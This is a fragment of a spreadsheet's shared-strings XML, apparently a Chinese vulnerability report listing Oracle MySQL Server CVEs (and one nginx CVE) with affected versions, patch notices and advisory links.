    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3161)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-930
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-13.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2482）</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.42版本(含),5.7.0版本(含)到5.7.24版本(含),8.0.0版本(含)到8.0.13版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-653
https://security.netapp.com/advisory/ntap-20190118-0002/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</si>
  <si>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Server安全漏洞（CVE-2019-2455）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-649
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2455</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2503）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-671
https://security.netapp.com/advisory/ntap-20190118-0002/
http://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://usn.ubuntu.com/3867-1/
https://access.redhat.com/errata/RHSA-2019:1258
https://access.redhat.com/errata/RHSA-2019:2511
https://access.redhat.com/errata/RHSA-2019:1258
https://access.redhat.com/errata/RHSA-2019:2327
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://www.auscert.org.au/bulletins/ESB-2019.2967/
https://www.auscert.org.au/bulletins/80370
https://packetstormsecurity.com/files/153920/Red-Hat-Security-Advisory-2019-2327-01.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/154103/Red-Hat-Security-Advisory-2019-2511-01.html
https://www-01.ibm.com/support/docview.wss?uid=ibm10883622</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2434）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-636
https://security.netapp.com/advisory/ntap-20190118-0002/
https://access.redhat.com/errata/RHSA-2019:2484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</si>
  <si>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 输入验证错误漏洞(CVE-2021-2178)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2179)</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3732)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpujul2017-3236622）以及相应补丁:cpujul2017-3236622：Oracle Critical Patch Update Advisory - July 2017链接：http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3731)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.35版本(含),5.7.0版本(含)到5.7.18版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpuoct2017-3236626）以及相应补丁:cpuoct2017-3236626：Oracle Critical Patch Update Advisory - Oct 2017链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2018-0734）</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.42版本(含),5.7.0版本(含)到5.7.24版本(含),8.0.0版本(含)到8.0.13版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 输入验证错误漏洞(CVE-2021-2342)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.34版本(含),6.0.0版本(含)到8.0.25版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-22926)</t>
  </si>
  <si>
    <t>链接：https://www.oracle.com/security-alerts/cpuoct2021.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22926</t>
  </si>
  <si>
    <t>Oracle MySQL Server 信息泄露漏洞（CVE-2021-22946）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁获取链接：https://www.oracle.com/security-alerts/cpujan2022.html</t>
  </si>
  <si>
    <t>链接：https://www.oracle.com/security-alerts/cpujan2022.html
https://ubuntu.com/security/notices/USN-5079-2</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3455)</t>
  </si>
  <si>
    <t>5.7.0≤Oracle MySQL Server≤5.7.17</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</si>
  <si>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https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_38197&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2021-22925)</t>
  </si>
  <si>
    <t>5.7.0 &lt;= MySQL &lt;= 5.7.358.0.0 &lt;= MySQL &lt;= 8.0.26</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-22925</t>
  </si>
  <si>
    <t>nginx 安全漏洞(CVE-2019-9513)</t>
  </si>
  <si>
    <t>https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-9513
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9513
http://nginx.org/en/download.html
https://blog.csdn.net/jiahao1186/article/details/122230459</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞 (CVE-2019-2755)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.15版本(含),5.7.0版本(含)到5.7.25版本(含)</t>
  </si>
  <si>
    <t>http://www.oracle.com/index.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-950
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2948)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.16版本(含),5.7.0版本(含)到5.7.26版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html</t>
  </si>
  <si>
    <t>暂无
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://nvd.nist.gov/vuln/detail/CVE-2019-2948
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 信息泄露漏洞(CVE-2019-2969)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.16版本(含),5.7.0版本(含)到5.7.26版本(含),5.6.0版本(含)到5.6.44版本(含)</t>
  </si>
  <si>
    <t>参见《Oracle MySQL Server 信息泄露漏洞(CVE-2019-2969)-修复方案》</t>
  </si>
  <si>
    <t>暂无
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2780)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2804)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2812)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2020-2814)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.47版本(含),5.7.0版本(含)到5.7.28版本(含),8.0.0版本(含)到8.0.18版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14559)</t>
  </si>
  <si>
    <t>影响mysql:5.6.48以下版本(含),5.7.0版本(含)到5.7.30版本(含),8.0.0版本(含)到8.0.20版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202007-707
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14550)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202007-725
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server：Optimizer 安全漏洞(CVE-2020-14793)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-944</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server: Optimizer 安全漏洞(CVE-2020-14769)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-964</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server: Security: LDAP Auth 安全漏洞(CVE-2020-14827)</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2528）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-690
https://security.netapp.com/advisory/ntap-20190118-0002/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</si>
  <si>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Server安全漏洞（CVE-2019-2486）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-655
https://security.netapp.com/advisory/ntap-20190118-0002/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</si>
  <si>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Server/MariaDB 组件安全漏洞(CVE-2018-2612)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-604
https://www.debian.org/security/2018/dsa-4341</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2573)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-603
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2622)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.58版本(含),5.6.0版本(含)到5.6.38版本(含),5.7.0版本(含)到5.7.20版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-607
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2019:1258
https://www.debian.org/security/2018/dsa-4091
https://access.redhat.com/errata/RHSA-2018:2439
https://usn.ubuntu.com/3537-2/
https://usn.ubuntu.com/3537-1/
https://access.redhat.com/errata/RHSA-2018:0587
https://access.redhat.com/errata/RHSA-2018:0586
https://security.netapp.com/advisory/ntap-20180117-0002/
http://www.securitytracker.com/id/1040216
https://lists.debian.org/debian-lts-announce/2018/01/msg00024.html
https://access.redhat.com/errata/RHSA-2018:2729
https://access.redhat.com/errata/RHSA-2019:1258
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2591)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.38版本(含),5.7.0版本(含)到5.7.19版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-597
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2576)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.20版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-778
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2586)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-769
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2600)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-758
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-2667)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201801-699
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3454)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.17版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1321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</si>
  <si>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https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1320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</si>
  <si>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安全漏洞(CVE-2017-3463)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.54版本(含),5.6.0版本(含)到5.6.35版本(含),5.7.0版本(含)到5.7.17版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1312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</si>
  <si>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Server安全漏洞（CVE-2019-2632）</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.25版本(含),8.0.0版本(含)到8.0.15版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html#AppendixMSQL</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2581）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-781
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
http://www.oracle.com/index.html
http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://usn.ubuntu.com/3957-1/
https://access.redhat.com/errata/RHSA-2019:2484
https://support.f5.com/csp/article/K58502649
https://access.redhat.com/errata/RHSA-2019:2511
https://usn.ubuntu.com/3957-1/
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-April-2019-29050
https://packetstormsecurity.com/files/154103/Red-Hat-Security-Advisory-2019-2511-01.html
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-potentially-impacted-by-vulnerabilities-in-mysql/
https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html
https://www.auscert.org.au/bulletins/79866</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2683）</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.43版本(含),5.7.0版本(含)到5.7.25版本(含),8.0.0版本(含)到8.0.15版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-680
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
http://www.oracle.com/index.html
http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://usn.ubuntu.com/3957-1/
https://access.redhat.com/errata/RHSA-2019:2484
https://support.f5.com/csp/article/K28312671
https://access.redhat.com/errata/RHSA-2019:2511
https://usn.ubuntu.com/3957-1/
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-April-2019-29050
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-potentially-impacted-by-vulnerabilities-in-mysql/
https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html
https://www.auscert.org.au/bulletins/79866</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2627）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-732
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
http://www.oracle.com/index.html
https://support.f5.com/csp/article/K32798641
https://usn.ubuntu.com/3957-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://usn.ubuntu.com/3957-1/
https://usn.ubuntu.com/3957-2/
https://usn.ubuntu.com/3957-3/
https://usn.ubuntu.com/3957-2/
https://usn.ubuntu.com/3957-1/
https://www.suse.com/support/update/announcement/2019/suse-su-20193270-1.html
https://packetstormsecurity.com/files/152659/Ubuntu-Security-Notice-USN-3957-1.html
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-April-2019-29050
https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html
https://www.auscert.org.au/bulletins/79866
https://www.auscert.org.au/bulletins/ESB-2019.1856.2/
https://www.auscert.org.au/bulletins/ESB-2019.1856/
https://www.auscert.org.au/bulletins/ESB-2019.4642/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2791)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.26版本(含),8.0.0版本(含)到8.0.16版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-905
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-17.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-984
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-986</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2757)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-902
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://support.f5.com/csp/article/K14118520
https://access.redhat.com/errata/RHSA-2019:2484
https://usn.ubuntu.com/4070-1/
https://access.redhat.com/errata/RHSA-2019:2511
https://access.redhat.com/errata/RHSA-2019:2511
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://nvd.nist.gov/vuln/detail/CVE-2019-2757
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://www.auscert.org.au/bulletins/ESB-2019.3849/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://www.ibm.com/support/pages/node/1078971
https://www.auscert.org.au/bulletins/ESB-2019.2784/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2774)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-900</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2805)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-914
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://seclists.org/bugtraq/2019/Aug/1
https://usn.ubuntu.com/4070-1/
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://www.suse.com/support/update/announcement/2019/suse-su-20193311-1.html
https://usn.ubuntu.com/4070-2/
https://www.suse.com/support/update/announcement/2019/suse-su-20193369-1.html
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2020.0902/
https://nvd.nist.gov/vuln/detail/CVE-2019-2805
https://www.auscert.org.au/bulletins/ESB-2019.3082/
https://packetstormsecurity.com/files/153862/Slackware-Security-Advisory-mariadb-Updates.html
https://packetstormsecurity.com/files/154037/Ubuntu-Security-Notice-USN-4070-3.html
https://www.auscert.org.au/bulletins/ESB-2019.2784/
https://www.auscert.org.au/bulletins/ESB-2019.4683/
https://www.auscert.org.au/bulletins/ESB-2019.4773/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-an-oracle-mysql-vulnerabilities-2/</t>
  </si>
  <si>
    <t>Oracle MySQL cURL 组件输入验证错误漏洞(CVE-2022-32221)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.31版本(含),5.7.0版本(含)到5.7.40版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpujan2023.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2023.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2022-21592)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.29版本(含),5.7.0版本(含)到5.7.39版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://www.oracle.com/security-alerts/cpuoct2022.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2022.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2776)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1245
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2810)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1211
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://security.gentoo.org/glsa/201908-24
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2816)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1205
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://usn.ubuntu.com/3629-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2846)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1175
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://usn.ubuntu.com/3629-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3070)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1361
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-23.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1525</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3060)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1371
https://usn.ubuntu.com/3725-1/
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://security.netapp.com/advisory/ntap-20180726-0002/
http://www.securitytracker.com/id/1041294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https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3062)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.40以下版本(含),5.7.0版本(含)到5.7.22版本(含),8.0.0版本(含)到8.0.11版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1369
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-12.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1353
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1352
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1358
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1351
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1364
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1366
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1367
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1357</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3071)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.22版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1360
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-23.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1525
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1365
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1366
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1367
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1369
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1370
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201803-951
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1354
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1374
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1376</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3077)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1354
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-23.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1525
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1365
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1366
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1367
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1369
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1370
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201803-951</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3061)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1370
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-23.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1525
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1365
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1366
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1367
